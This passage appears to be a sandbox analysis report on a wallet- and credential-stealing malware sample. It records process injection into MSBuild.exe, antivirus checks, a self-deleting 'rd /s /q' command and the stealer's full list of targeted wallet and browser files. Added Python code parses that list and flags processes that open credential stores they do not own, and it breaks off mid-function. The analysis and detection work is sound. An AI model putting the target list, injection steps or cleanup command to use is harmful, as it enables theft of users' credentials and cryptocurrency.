Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 6_2_0041CAF5 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 6_2_0041CAF5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 6_2_1FE142AF SetUnhandledExceptionFilter, 6_2_1FE142AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 6_2_1FE12C8E IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 6_2_1FE12C8E
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe Memory protected: page guard

HIPS / PFW / Operating System Protection Evasion

Source: Yara match File source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, type: SAMPLE
Source: Yara match File source: Process Memory Space: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe PID: 6448, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: EHDHIDAEHC.exe PID: 5460, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: MSBuild.exe PID: 1596, type: MEMORYSTR
Source: C:\ProgramData\EHDHIDAEHC.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe Code function: 0_2_003DED80 memset,CreateProcessA,VirtualAlloc,GetThreadContext,ReadProcessMemory,VirtualAllocEx,ResumeThread,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread, 0_2_003DED80
Source: C:\ProgramData\EHDHIDAEHC.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe Code function: 0_2_003E1400 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,FindCloseChangeNotification, 0_2_003E1400
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe Code function: 0_2_003E12F0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle, 0_2_003E12F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 6_2_00411400 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle, 6_2_00411400
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 6_2_004112F0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle, 6_2_004112F0
Source: C:\ProgramData\EHDHIDAEHC.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000
Source: C:\ProgramData\EHDHIDAEHC.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 401000
Source: C:\ProgramData\EHDHIDAEHC.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 420000
Source: C:\ProgramData\EHDHIDAEHC.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 428000
Source: C:\ProgramData\EHDHIDAEHC.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 63D000
Source: C:\ProgramData\EHDHIDAEHC.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 63E000
Source: C:\ProgramData\EHDHIDAEHC.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: D06008
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe Process created: C:\ProgramData\EHDHIDAEHC.exe "C:\ProgramData\EHDHIDAEHC.exe"
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\BFCAAEHJDBKJ" & exit
Source: C:\ProgramData\EHDHIDAEHC.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe Code function: 0_2_003D1000 cpuid 0_2_003D1000
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree, 0_2_003DFC30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree, 6_2_0040FC30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: EnumSystemLocalesW, 6_2_20002CB6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: EnumSystemLocalesW, 6_2_20002D38
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: EnumSystemLocalesW, 6_2_20002DF9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 6_2_20003300
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: GetLocaleInfoW, 6_2_1FE12112
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 6_2_1FE13AA3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: EnumSystemLocalesW, 6_2_1FFEFF17
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe Queries volume information: C:\ VolumeInformation
Source: C:\ProgramData\EHDHIDAEHC.exe Queries volume information: C:\ProgramData\EHDHIDAEHC.exe VolumeInformation
Source: C:\ProgramData\EHDHIDAEHC.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe Code function: 0_2_003EA440 GetLocalTime,SystemTimeToFileTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z, 0_2_003EA440
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe Code function: 0_2_003DFAE0 GetProcessHeap,HeapAlloc,GetUserNameA, 0_2_003DFAE0
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe Code function: 0_2_003DFBC0 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA, 0_2_003DFBC0
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174954399.00000000031BE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2344932078.00000000012C8000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2344932078.0000000001393000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

Stealing of Sensitive Information

Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, type: SAMPLE
Source: Yara match File source: 0.2.a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe.3d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.EHDHIDAEHC.exe.439a680.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.EHDHIDAEHC.exe.436ce50.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.EHDHIDAEHC.exe.3e931c0.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.EHDHIDAEHC.exe.3ec09f0.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe.3d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.EHDHIDAEHC.exe.439a680.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.MSBuild.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.MSBuild.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.EHDHIDAEHC.exe.436ce50.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.EHDHIDAEHC.exe.3ec09f0.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.EHDHIDAEHC.exe.3e931c0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000004.00000002.2094707680.000000000436C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2094707680.0000000003EC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2092269679.0000000002FC9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000000.1698830320.00000000003F0000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2094707680.000000000439A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2173978549.00000000003F0000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2343148482.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2094707680.0000000003E93000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.2021713393.000000000325C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2174954399.0000000003237000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe PID: 6448, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: EHDHIDAEHC.exe PID: 5460, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: MSBuild.exe PID: 1596, type: MEMORYSTR
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.00000000032FF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021825975.00000000032B3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Binance\simple-storage.jsonM`
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021825975.00000000032B3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\*.*r
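The pipe-delimited string above is the stealer's wallet-target table: five fields per entry (label, base-directory code, subdirectory, file mask, trailing 0/1 flag), entries simply concatenated. The parser below is an added example written for this page, not code from the sandbox vendor or from the malware; it carves the table out of a raw dump region, splits it into records and expands each record to the directory that the "File opened" events later in this section show the sample touching. The meaning of base codes 0 (AppData\Local) and 1 (AppData\Roaming) is taken from those events; code 2 as the profile root and the trailing flag as a recursion switch are assumptions, as are all function and variable names.

```python
import re
from dataclasses import dataclass
from typing import List

# Wallet-target block recovered from the sample's memory, copied verbatim from the
# string shown above and split over several literals only for readability.
VIDAR_WALLET_CONFIG = (
    r"Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|"
    r"Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|"
    r"Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|"
    r"Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|"
    r"Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|"
    r"Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|"
    r"Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|"
    r"Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|"
    r"Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|"
    r"Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|"
    r"Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|"
    r"Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|"
    r"Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|"
    r"Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|"
    r"Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|"
    r"Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|"
    r"Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|"
    r"Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|"
    r"Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|"
)


@dataclass(frozen=True)
class WalletTarget:
    name: str      # label the stealer uses for the loot folder
    base: int      # base-directory code, see base_dir()
    subdir: str    # path under the base directory, with leading and trailing backslash
    mask: str      # file name or wildcard to collect
    recurse: bool  # trailing 0/1 field; assumed to mean "descend into subdirectories"


def parse_wallet_targets(config: str) -> List[WalletTarget]:
    """Split the pipe-delimited block into 5-field records; reject a truncated block."""
    fields = config.split("|")
    if fields and fields[-1] == "":
        fields.pop()  # the block ends with a separator
    if len(fields) % 5:
        raise ValueError(f"truncated block: {len(fields)} fields, expected a multiple of 5")
    targets = []
    for i in range(0, len(fields), 5):
        name, base, subdir, mask, flag = fields[i:i + 5]
        targets.append(WalletTarget(name, int(base), subdir, mask, flag == "1"))
    return targets


def base_dir(code: int, user: str) -> str:
    # Codes 0 and 1 are confirmed by the "File opened" events in this section
    # (Coinomi|0 -> AppData\Local, Bitcoin Core|1 -> AppData\Roaming). Code 2 is an
    # assumption (profile root), because the Chia entries begin with "\.chia\".
    profile = "C:\\Users\\" + user
    bases = {0: profile + r"\AppData\Local", 1: profile + r"\AppData\Roaming", 2: profile}
    if code not in bases:
        raise ValueError(f"unknown base-directory code {code}")
    return bases[code]


def resolve_dir(t: WalletTarget, user: str = "user") -> str:
    """Absolute directory the stealer opens for this target (same form as the report's paths)."""
    return base_dir(t.base, user) + t.subdir


def hunting_globs(targets: List[WalletTarget], user: str = "user") -> List[str]:
    """Full path patterns to watch, or to grep for in an EDR file-open timeline."""
    return [resolve_dir(t, user) + t.mask for t in targets]


# A field is any run of printable bytes without a pipe; an entry is five of them with
# a one-digit base code and a 0/1 flag in the positions the table above uses.
_FIELD = rb"[^|\x00-\x1f\x7f]+"
_ENTRY = _FIELD + rb"\|[0-9]\|" + _FIELD + rb"\|" + _FIELD + rb"\|[01]\|"
_BLOCK = re.compile(rb"(?:" + _ENTRY + rb")+")


def extract_wallet_config(blob: bytes) -> str:
    """Carve the longest run of well-formed entries out of a raw memory-dump region."""
    runs = _BLOCK.findall(blob)
    if not runs:
        raise ValueError("no wallet-target block found")
    return max(runs, key=len).decode("ascii")


if __name__ == "__main__":
    # Constructed stand-in for a .sdmp region: padding bytes around the real block.
    dump = b"\x00" * 16 + VIDAR_WALLET_CONFIG.encode() + b"\x00\xff"
    for t in parse_wallet_targets(extract_wallet_config(dump)):
        print(f"{t.name:<62} {resolve_dir(t)}{t.mask}  recurse={t.recurse}")
```

The carving regex anchors on the field shape rather than on a known wallet name, so it also picks up a table from a build that adds or reorders targets; the hard check in `parse_wallet_targets` is what tells you a dump region was cut mid-entry.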
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe File opened: C:\Users\user\AppData\Roaming\Exodus\
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe File opened: C:\Users\user\AppData\Roaming\Exodus\backups\
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe File opened: C:\Users\user\AppData\Roaming\Binance\
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\
Source: Yara match File source: Process Memory Space: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe PID: 6448, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: MSBuild.exe PID: 1596, type: MEMORYSTR
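The file-open events above show the two signals a SOC can key on: one process sweeping the credential stores of several unrelated applications (Chrome, Edge, Firefox, FileZilla, wallet directories) in a single run, and a .NET build host (MSBuild.exe) reading Chrome's History and Cookies files. The detection logic below is an added example written for this page, not part of the sandbox report; the event list is constructed from the lines in this section (PIDs taken from the Yara match lines, plus one benign chrome.exe control event that is not in the report), and the owner allowlist and the sweep threshold are assumptions to be tuned per environment.

```python
import fnmatch
import ntpath
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List, Optional, Set, Tuple


@dataclass(frozen=True)
class FileEvent:
    pid: int
    image: str   # full path of the opening process
    path: str    # file or directory it opened


# Credential stores touched in this report, paired with the processes assumed to own
# them. Patterns use fnmatch wildcards ("*" also spans backslashes); the owner sets are
# an assumption for a typical workstation, not something the report states.
CREDENTIAL_STORES: List[Tuple[str, str, Set[str]]] = [
    (r"*\Google\Chrome\User Data\*\Login Data",      "chrome",    {"chrome.exe"}),
    (r"*\Google\Chrome\User Data\*\Web Data",        "chrome",    {"chrome.exe"}),
    (r"*\Google\Chrome\User Data\*\History",         "chrome",    {"chrome.exe"}),
    (r"*\Google\Chrome\User Data\*\Network\Cookies", "chrome",    {"chrome.exe"}),
    (r"*\Microsoft\Edge\User Data\*\Login Data",     "edge",      {"msedge.exe"}),
    (r"*\Microsoft\Edge\User Data\*\History",        "edge",      {"msedge.exe"}),
    (r"*\Mozilla\Firefox\Profiles\*\cookies.sqlite", "firefox",   {"firefox.exe"}),
    (r"*\Mozilla\Firefox\Profiles\*\places.sqlite",  "firefox",   {"firefox.exe"}),
    (r"*\FileZilla\recentservers.xml",               "filezilla", {"filezilla.exe"}),
    (r"*\AppData\Roaming\Bitcoin\wallets\*",         "bitcoin",   {"bitcoin-qt.exe", "bitcoind.exe"}),
    (r"*\AppData\Roaming\Exodus\exodus.wallet\*",    "exodus",    {"exodus.exe"}),
]


def classify(path: str) -> Optional[Tuple[str, Set[str]]]:
    """Map an opened path to (application, owning processes) if it is a known store."""
    p = path.lower()  # NTFS is case-insensitive; compare lowercased on any host
    for pattern, app, owners in CREDENTIAL_STORES:
        if fnmatch.fnmatchcase(p, pattern.lower()):
            return app, owners
    return None


def detect(events: List[FileEvent], sweep_threshold: int = 2) -> List[Dict]:
    """One alert per (pid, image) that opens a credential store it does not own.

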